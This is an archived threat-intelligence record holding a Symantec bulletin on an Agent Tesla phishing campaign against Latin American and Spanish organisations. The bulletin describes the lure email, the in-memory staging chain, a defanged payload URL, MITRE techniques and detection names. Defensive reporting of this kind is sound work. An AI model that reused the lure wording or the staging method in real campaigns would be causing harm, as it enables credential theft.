{
	"id": "06755e9f-37c0-4046-bcff-b990e985a00f",
	"created_at": "2026-04-06T00:15:27.777036Z",
	"updated_at": "2026-04-10T03:21:12.009429Z",
	"deleted_at": null,
	"sha1_hash": "461bcaca1ccb315f5961c58d31f8387a10da7e81",
	"title": "Multi-Stage In-Memory Agent Tesla Campaign Targets LATAM",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 44547,
	"plain_text": "Multi-Stage In-Memory Agent Tesla Campaign Targets LATAM\r\nArchived: 2026-04-05 17:39:29 UTC\r\nSymantec has identified a new Agent Tesla campaign leveraging business-themed social engineering to target\r\norganizations across Latin America, Spain, and other international sectors. The actor impersonates a company that\r\nadvertises outsourced management, consulting, and facility services.\r\nThe email (Subject: “Solicito su apoyo para procesar y confirmar Orden de Compra adjunta”) requests support to\r\nprocess and confirm an attached purchase order (Orden de compra_N202501023.PDF.001)\r\nThe message instructs the recipient to urgently confirm delivery dates and pricing, suggesting that failure to\r\nrespond within 48 hours implies acceptance — a technique designed to push rapid user action. The attached file\r\nmasquerades as a PDF invoice but is instead a compressed archive used to launch malware.\r\nAttack chain: Email \u003e RAR attachment \u003e JScript loader (.jse) \u003e PowerShell (downloaded) \u003e PowerShell (in-memory execution) \u003e .NET loader (in-memory) \u003e .NET Agent Tesla payload (in-memory)\r\nThe PowerShell downloader retrieves its second stage from hxxp://172[.]245[.]246[.]93/jojoServer_Encrypted.jpg\r\n— a common steganographic-style trick, though the payload is not an image.\r\nOnce executed, the staged loaders transition fully in-memory to hinder detection and avoid leaving artifacts on\r\ndisk. The malware leverages obfuscation, masquerading, and AMSI bypass techniques to remain stealthy, before\r\nharvesting credentials and system information for exfiltration over encrypted channels. \r\nObserved techniques include:\r\nExecution: Native API (T1106)\r\nPersistence \u0026 PrivEsc: Registry modification / system process tampering (T1112, T1543, T1055)\r\nDefense Evasion: Obfuscation, masquerading, AMSI bypass, encrypted C2 (T1027, T1036, T1562,\r\nT1573)\r\nCredential Access: Credential dumping, email credential harvesting (T1003, T1552, T1114)\r\nDiscovery \u0026 Collection: System discovery and data harvesting (T1057, T1082, T1005)\r\nC2: HTTP(S) encrypted communications (T1071, T1573)\r\nThis campaign shows broad, opportunistic targeting across Latin America and select international regions.\r\nPrimary targeting includes Mexico, Peru, Colombia, Dominican Republic, Ecuador, Costa Rica, Brazil, Chile, and\r\nSpain.\r\nImpacted sectors span:\r\nFinance \u0026 Banking / Insurance\r\nGovernment (Health, Finance, Environment)\r\nRetail / E-commerce\r\nAutomotive \u0026 Heavy Machinery\r\nhttps://www.broadcom.com/support/security-center/protection-bulletin/multi-stage-in-memory-agent-tesla-campaign-targets-latam\r\nPage 1 of 2\n\nEnergy / Utilities / Mining\r\nManufacturing (Paper, Packaging, Defense Components)\r\nTelecommunications, Logistics \u0026 Maritime\r\nHealthcare / Diagnostics\r\nAgriculture \u0026 Food Supply Chain\r\nNGOs and Research Organizations\r\nSymantec protects you from this threat, identified by the following:\r\nBehavior-based\r\nSONAR.Stealer!gen1\r\nCarbon Black-based\r\nAssociated malicious indicators are blocked and detected by existing policies within Carbon Black\r\nproducts. The recommended policy at a minimum is to block all types of malware from executing (Known,\r\nSuspect, and PUP) as well as delay execution for cloud scan to get maximum benefit from Carbon Black\r\nCloud reputation service.\r\nEDR-based\r\nBoth Symantec and Carbon Black EDR are capable of monitoring and flagging this threat actor's tactics,\r\ntechniques and procedures.\r\nEmail-based\r\nCoverage is in place for Symantec's email security products and Email Threat Isolation (ETI) technology\r\nprovides an extra layer of protection for our customers.\r\nFile-based\r\nISB.Downloader!gen348\r\nTrojan.Gen.MBT\r\nXSNet.Js!gen2\r\nXSNet.Ps1!gen2\r\nMachine Learning-based\r\nHeur.AdvML.B\r\nWeb-based\r\nObserved domains/IPs are covered under security categories in all WebPulse enabled products\r\nSource: https://www.broadcom.com/support/security-center/protection-bulletin/multi-stage-in-memory-agent-tesla-campaign-targets-latam\r\nhttps://www.broadcom.com/support/security-center/protection-bulletin/multi-stage-in-memory-agent-tesla-campaign-targets-latam\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.broadcom.com/support/security-center/protection-bulletin/multi-stage-in-memory-agent-tesla-campaign-targets-latam"
	],
	"report_names": [
		"multi-stage-in-memory-agent-tesla-campaign-targets-latam"
	],
	"threat_actors": [],
	"ts_created_at": 1775434527,
	"ts_updated_at": 1775791272,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/461bcaca1ccb315f5961c58d31f8387a10da7e81.pdf",
		"text": "https://archive.orkl.eu/461bcaca1ccb315f5961c58d31f8387a10da7e81.txt",
		"img": "https://archive.orkl.eu/461bcaca1ccb315f5961c58d31f8387a10da7e81.jpg"
	}
}